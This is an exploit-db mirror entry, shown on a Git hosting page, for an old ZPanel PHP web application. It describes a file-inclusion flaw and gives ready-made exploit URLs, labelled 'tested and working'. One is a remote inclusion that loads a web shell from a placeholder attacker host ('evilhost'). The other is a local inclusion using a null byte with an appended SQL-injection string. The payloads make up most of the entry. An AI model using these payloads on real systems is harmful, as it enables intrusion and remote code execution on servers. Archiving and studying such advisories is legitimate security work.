bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/881.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
424 B
Text
Raw Blame History

# Tested and working /str0ke
It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.
[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script
[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
# milw0rm.com [2005-03-15]
Reference in a new issue View git blame Copy permalink